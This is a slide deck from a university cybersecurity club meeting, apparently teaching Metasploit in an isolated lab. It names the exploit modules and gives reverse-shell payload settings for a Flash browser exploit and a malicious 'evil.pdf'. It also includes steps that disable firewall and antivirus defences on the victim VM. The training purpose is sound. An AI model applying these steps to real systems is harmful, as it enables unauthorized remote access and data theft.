cyber uc meeting 79
play

Cyber@UC Meeting 79 Metasploit If Youre New! Join our Slack: - PowerPoint PPT Presentation

Jan 11, 2023 •556 likes •693 views

Cyber@UC Meeting 79 Metasploit If Youre New! Join our Slack: cyberatuc.slack.com Check out our website: cyberatuc.org SIGN IN! (Slackbot will post the link in #general every Wed@6:30) Feel free to get involved with one of

  1. Cyber@UC Meeting 79 Metasploit

  2. If You’re New! ● Join our Slack: cyberatuc.slack.com Check out our website: cyberatuc.org ● SIGN IN! (Slackbot will post the link in #general every Wed@6:30) ● ● Feel free to get involved with one of our committees: Content Finance Public Affairs Outreach Recruitment Lab Ongoing work in our research lab! ●

  3. Announcements ● Looking for lab committee volunteers! Merchandise on the way, Online Shop ● STEM FEST on Dec 1st ! ● ● We’re going to NorseRage's CTF at NKU on November 28th ( tomorrow ) The TVs are finally mounted! ● Ohio Officials visited our RAPIDS Lab! ● ● Battelle Internships

  4. Weekly News

  5. Recommended Reading https://thehackernews.com/2018/11/instagram-password-hack.html https://thehackernews.com/2018/11/usps-data-breach.html https://thehackernews.com/2018/11/cybersecurity-bug-bounty.html https://thehackernews.com/2018/11/apple-macos-zeroday.html

  7. Metasploit Open Source collection of Exploits and Payloads that makes exploiting systems really easy.

  8. Installing Metasploit ● [Easiest] Included with Kali , but may need updated [Harder] metasploit.com/get-started ● If you need a Windows VM, search google for “Windows VM” and go to the ● “Free Virtual Machines” page on developer.microsoft.com

  9. Install correct adobe versions on Windows VM ● Adobe Reader 8.1.0 ftp://ftp.adobe.com/pub/adobe/reader/win/ ● Flash 18.0.0.194 ● ● https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html ● Create a host-only network in global tools if one does not already exist Create a shared folder to transfer in installers ● Disable shared folder ● ● Ensure both Kali and Windows are host-only

  10. Lowering fences ● Older exploit, we need to lower some fences to allow the exploit to run Turn off Windows Firewall ● Disable Windows Defender ● ● Reduce internet explorer settings to lowest possible ● Reduce security in Adobe Reader 8.1.0 Enable menu items JavaScript execution privileges ○ ○ Disable verifying signatures when documents are opened

  11. Flash browser exploit ● Open up armitage Setup multi/browser/adobe_flash_hacking_team_uaf ● ○ Payload: windows/meterpreter/reverse_tcp ○ Srvhost: 192.168.56.4, my Kali IP at the time of making these slides ○ Uripath: /flashexpl ○ Lhost: 192.168.56.4 From Windows, navigate to 192.168.56.4:8080/flashexpl ● ● Return to armitage, right click newly hacked machine ● Select open meterpreter shell Ls, Download, Upload, cd, cat, execute ○

  12. PDF exploit ● Open armitage Select windows/fileformat/adobe_pdf_embedded_exe ● ○ Filename: evil.pdf ○ Lhost: 192.168.56.4 Kali’s IP ○ Payload: windows/meterpreter/reverse_tcp ● Move evil.pdf onto windows machine, maybe through upload? Setup listenever exploit multi/handler ● ○ Lhost: 192.168.56.4 Kali’s IP ○ Payload: windows/meterpreter/reverse_tcp ○ LPort:27140, needs to be the same as what was used in the exploit above ● Open evil.pdf in Windows, save template.pdf to a location

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our committees:

430 views • 23 slides
NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For

NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For

NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For ACM CCS I ndustry/ Govt Track Oct. 26, 2004 Carl Landwehr ( clandweh@nsf.gov ) Cyber Trust Coordinator National Science Foundation What s the

439 views • 17 slides
CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College

CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College

3/29/2012 CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College of India I N T R O D U C T I O N What is Cyber-safety Consequences Threats of Inaction Cyber-safety? Cyber-safety Cyber-safety at

215 views • 7 slides
What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is

What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is

R egional C yber C rime U nit DC Louise Gibson Prepare, Prevent & Protect What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is enhanced in scale or Crimes that can only be committed solely reach by use

316 views • 9 slides
Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework

Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework

Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework Reporting Objectives Executive Summary Information Assess Current Cyber Security Posture Measure Progress Toward Improvement Assess

634 views • 5 slides
The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities?

The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities?

The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities? What is the FBIs Cyber Structure? HQ Division Dedicated Cyber squads in all 56 field offices, including satellite locations overseas.

1.54k views • 14 slides
Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber

Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber

Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber Dependent crime examples of these offences are Distributed Denial of Service attack (DDOS), Account Compromise (hacking), Malware (virus) and

237 views • 7 slides
FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019)

FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019)

FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019) (Presented again at the October 16, 2018, meeting of the Maryland Cybersecurity Council and published with permission.) Overview Current Landscape

560 views • 23 slides
Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK

Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK

Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK businesses and how to remain safe What help is available Further reading Setting the scene 21.2bn The cost of fraud to the

304 views • 19 slides
Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT

Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT

Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT ITY How cyber is becoming a key aspect of the ubiquity generation. CYBER SUMMIT More to come 3 2018 Deloitte Cyber Risk Services 4 2018

514 views • 19 slides
Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division

Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division

Homeland Security Advanced Research Projects Agency A View from Washington: The Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division Director http://www.dhs.gov/cyber-research Presentation Outline

794 views • 32 slides
CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY

CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY

CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY HAPPEN London June 2019 INTRODUCTION Cyber Security The activity or process, ability or capability, or state whereby information and

735 views • 24 slides
Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the

Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the

Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the Land: : Wh What t the Numbe mbers rs Tell l Us Visit www.advisenltd.com at the end of this webinar to download: Copy of these slides

722 views • 31 slides
Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of

563 views • 11 slides
Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack:

Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack:

Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack: ucyber.slack.com SIGN IN! (Slackbot will post the link in #general) Feel free to get involved with one of our committees: Content Finance Public

525 views • 23 slides
Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack:

Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack:

Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack: ucyber.slack.com SIGN IN! (Slackbot will post the link in #general every Wed@6:30) Feel free to get involved with one of our committees: Content

491 views • 14 slides
LEDBAT A PPLICATIONS P RACTICES AND R ECOMMENDATIONS Presenter: Reinaldo Penno,

LEDBAT A PPLICATIONS P RACTICES AND R ECOMMENDATIONS Presenter: Reinaldo Penno,

LEDBAT A PPLICATIONS P RACTICES AND R ECOMMENDATIONS Presenter: Reinaldo Penno, rpenno@juniper.net Co-Authors: Joe Touch, touch@ISI.EDU Richard Woundy, richard_woundy@cable.comcast.com Vijay K. Gurbani, vkg@bell-labs.com Satish Raghunath,

642 views • 15 slides
Can your site work on IE3? By: Chen Hui Jing @hj_chen Talk CSS #39 (22 May 2019) Yeo Kheng Meng

Can your site work on IE3? By: Chen Hui Jing @hj_chen Talk CSS #39 (22 May 2019) Yeo Kheng Meng

Can your site work on IE3? By: Chen Hui Jing @hj_chen Talk CSS #39 (22 May 2019) Yeo Kheng Meng @yeokm1 1 1 Agenda 1. Background 2. Quick Live Demo 3. How I got DOS 6.22, Win3.1 and networking to work 4. Live coding/debugging 2

146 views • 13 slides
Internet Explorer turns your personal computer into a public File Server Black Hat DC 2010 |

Internet Explorer turns your personal computer into a public File Server Black Hat DC 2010 |

Internet Explorer turns your personal computer into a public File Server Black Hat DC 2010 | Jorge Luis Alvarez Medina 1 Jorge Luis Alvarez Medina | CORE Security Technologies | February 2010 Outline Attack results Internet Explorer

609 views • 38 slides
Real-World Performance of current Mesh Protocols in a small-scale Dual-Radio Multi-Link

Real-World Performance of current Mesh Protocols in a small-scale Dual-Radio Multi-Link

Real-World Performance of current Mesh Protocols in a small-scale Dual-Radio Multi-Link Environment Karl Jonas Manuel Hachtkemper Michael Rademacher manuel.hachtkemper@inf.h-brs.de karl.jonas@h-brs.de michael.rademacher@h-brs.de 22. ITG

450 views • 17 slides
Design, Privilege Separation CS 161: Computer Security Prof. David Wagner January 27, 2016

Design, Privilege Separation CS 161: Computer Security Prof. David Wagner January 27, 2016

Software Security: Design, Privilege Separation CS 161: Computer Security Prof. David Wagner January 27, 2016 Robustness Security bugs are a fact of life How can we use access control to improve the security of software, so security bugs

695 views • 32 slides
THE BROWSER IS DEAD Dan North Dan North & Associates LONG LIVE THE BROWSER! Dan North

THE BROWSER IS DEAD Dan North Dan North & Associates LONG LIVE THE BROWSER! Dan North

THE BROWSER IS DEAD Dan North Dan North & Associates LONG LIVE THE BROWSER! Dan North Dan North & Associates The gangs 1990: Tim Berners-Lee - (WorldWideWeb) 1993: NCSA Mosaic 1994: Netscape - Navigator 1995: Microsoft -

971 views • 21 slides
1 WeShare comes from the name in the address of the server. 2 SHAREPOINT is the name of

1 WeShare comes from the name in the address of the server. 2 SHAREPOINT is the name of

1 WeShare comes from the name in the address of the server. 2 SHAREPOINT is the name of the Application that runs on the server. It is a Microsoft application that is designed to enable people to Collaborate on documents. 3 One feature

434 views • 18 slides
New Statements 5 INDUCTION 1 Finance Statements 5 What is Statements 5 ? Financial reports

New Statements 5 INDUCTION 1 Finance Statements 5 What is Statements 5 ? Financial reports

Finance New Statements 5 INDUCTION 1 Finance Statements 5 What is Statements 5 ? Financial reports accessed via a web browser Security based on LSE network ID (single sign-on) Access remotely via remote desktop Runs against

918 views • 22 slides

More recommend